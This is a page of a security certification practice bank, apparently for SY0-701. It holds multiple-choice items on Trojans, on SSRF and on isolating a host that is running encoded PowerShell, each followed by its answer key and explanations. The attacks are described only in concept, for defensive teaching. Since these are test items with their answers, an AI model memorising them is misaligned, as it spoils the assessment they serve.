A Trojan is malware disguised as legitimate software, such as a free PDF-to-Word utility, that performs malicious actions without the user's knowledge. In this scenario, the Trojan exfiltrates data to an unknown server and disables the security agent, which are classic Trojan behaviors—unlike self-replicating worms or passive spyware. The user's intentional download from an unofficial website is the typical infection vector for Trojans.

Exam trap

The trap here is that candidates may confuse 'spyware' with 'Trojan' because both can steal data, but the key distinction is that a Trojan actively performs multiple malicious actions (including disabling security) and requires user execution, whereas spyware is typically passive and does not disable defenses.

How to eliminate wrong answers

Option B (Worm) is wrong because worms self-replicate and spread across networks without user interaction, whereas this malware required the user to download and execute the utility. Option C (Spyware) is wrong because spyware primarily passively monitors and collects data without actively disabling security agents or performing destructive actions. Option D (Rootkit) is wrong because rootkits specifically hide their presence by modifying the operating system kernel or drivers, and while disabling a security agent could be a rootkit behavior, the initial infection vector (a downloaded utility) and data exfiltration are more characteristic of a Trojan.

524
MCQeasy

Based on the exhibit, which attack is the developer most likely observing?

A.Cross-site scripting (XSS)
B.Server-side request forgery (SSRF)
C.SQL injection
D.CSRF
AnswerB

The application is being tricked into making a request to an internal metadata endpoint using a user-controlled URL parameter. That is server-side request forgery. SSRF is common in cloud environments because it can expose instance metadata, credentials, or internal services that should not be reachable from the outside.

Why this answer

The developer is most likely observing a server-side request forgery (SSRF) attack because the log shows the application making an outbound HTTP request to an internal IP address (10.0.0.1) initiated by user-supplied input (the 'url' parameter). SSRF occurs when an attacker manipulates the server to send crafted requests to internal or external resources, bypassing access controls. The exhibit's pattern of a server-side request to a private IP range directly indicates SSRF, not client-side or database attacks.

Exam trap

The trap here is that candidates confuse SSRF with CSRF because both involve requests, but SSRF is server-initiated while CSRF is client-initiated; the key clue is the server making a request to a private IP, not the user's browser.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not server-side requests to internal IPs; the log shows no script execution or client-side payload. Option C is wrong because SQL injection targets database queries via input fields, but the log shows an HTTP request to an internal IP, not a database error or query manipulation. Option D is wrong because CSRF (Cross-Site Request Forgery) tricks a user's browser into performing unintended actions on an authenticated site, whereas the exhibit shows the server itself making the request, not the client's browser.

525
MCQmedium

An EDR console alerts that powershell.exe launched with an encoded command on a finance workstation, and a minute later the host begins making repeated outbound connections to an unfamiliar IP address. What is the best initial response?

A.Run a full antivirus scan first and leave the workstation online so the user can keep working.
B.Isolate the workstation through the EDR platform and preserve logs and volatile evidence for investigation.
C.Power off the workstation immediately to ensure the malicious process stops.
D.Create a permanent firewall rule that allows the unfamiliar IP address so you can observe more traffic.
AnswerB

Encoded PowerShell combined with outbound beaconing is a strong indicator of active malicious behavior. Isolating the endpoint through EDR contains the incident while preserving the host’s state for analysis. This approach is better than pulling the plug because it reduces attacker activity without unnecessarily destroying volatile evidence. The analyst can then collect logs, memory, and process details before remediation or reimaging.

Why this answer

Option B is correct because isolating the workstation via the EDR platform stops the immediate threat (the malicious outbound connections) while preserving volatile evidence (e.g., running processes, network connections, memory contents) and logs for forensic analysis. This aligns with the incident response principle of containment before eradication, and EDR isolation typically uses a host-based firewall rule to block all traffic except to the EDR management server, ensuring the host remains accessible for investigation.

Exam trap

The trap here is that candidates confuse immediate containment (isolation) with eradication (antivirus scan) or evidence preservation (shutdown), but the SY0-701 emphasizes that isolation via EDR is the best initial response because it stops the threat without destroying volatile data.

How to eliminate wrong answers

Option A is wrong because running a full antivirus scan while the host remains online allows the attacker to continue exfiltration or lateral movement, and antivirus may miss fileless or encoded PowerShell attacks that never touch disk. Option C is wrong because powering off the workstation destroys volatile evidence (e.g., memory-resident malware, active network connections, process trees) and may prevent forensic analysis of the attack chain. Option D is wrong because creating a permanent firewall rule to allow the unfamiliar IP address would actively assist the attacker by ensuring uninterrupted command-and-control communication, violating the containment principle.

Page 6

Page 7 of 16

Page 8